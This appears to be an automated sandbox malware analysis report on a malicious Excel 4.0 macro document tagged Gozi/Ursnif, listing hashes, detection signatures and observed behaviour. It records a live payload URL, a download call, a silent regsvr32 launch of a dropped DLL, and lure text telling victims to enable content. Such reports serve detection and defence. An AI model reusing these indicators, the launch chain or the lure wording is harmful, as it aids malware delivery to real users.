Loading ...

Play interactive tourEdit tour

Analysis Report document-1425391613.xls

Overview

General Information

Sample Name:document-1425391613.xls
Analysis ID:324311
MD5:272290a1fec50e7ced8d5447e698cfeb
SHA1:394504cde4fe75c2f22ee5127d83a90d2259f8fc
SHA256:15f053ef9e78c3356fc0eafdd09c1b7e307e985f5a28e1ade7e943ec82ea03ef
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5856 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5552 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1425391613.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1425391613.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5856, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 5552

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1425391613.xlsVirustotal: Detection: 35%Perma Link
    Source: document-1425391613.xlsReversingLabs: Detection: 48%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 110MB
    Source: global trafficDNS query: name: seligue.net
    Source: global trafficTCP traffic: 192.168.2.3:49722 -> 192.185.215.146:443
    Source: global trafficTCP traffic: 192.168.2.3:49722 -> 192.185.215.146:443
    Source: Joe Sandbox ViewIP Address: 192.185.215.146 192.185.215.146
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: seligue.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.aadrm.com/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.office.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.onedrive.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://augloop.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cdn.entity.
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://clients.config.office.net/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://config.edge.skype.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cortana.ai
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://cr.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://devnull.onenote.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://directory.services.
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://graph.windows.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://graph.windows.net/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://lifecycle.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://login.windows.local
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://management.azure.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://management.azure.com/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://messaging.office.com/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://officeapps.live.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://onedrive.live.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://outlook.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://outlook.office365.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: document-1425391613.xlsString found in binary or memory: https://seligue.net/ds/231120.gif
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://settings.outlook.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://tasks.office.com
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: F0167333-A0B2-4A84-BBE2-E95029710D76.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable Content [El - O X 9+ Share :::.""" " Ct P Sort & Find & & Clear" Filter - Select " Edit
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1425391613.xlsInitial sample: CALL
    Source: document-1425391613.xlsInitial sample: CALL
    Source: document-1425391613.xlsInitial sample: CALL
    Source: document-1425391613.xlsInitial sample: CALL
    Source: document-1425391613.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1425391613.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1425391613.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
    Source: document-1425391613.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/6@1/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3A98E19A-A712-44A2-B11C-88B6A9ABE94E} - OProcSessId.datJump to behavior
    Source: document-1425391613.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: document-1425391613.xlsVirustotal: Detection: 35%
    Source: document-1425391613.xlsReversingLabs: Detection: 48%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
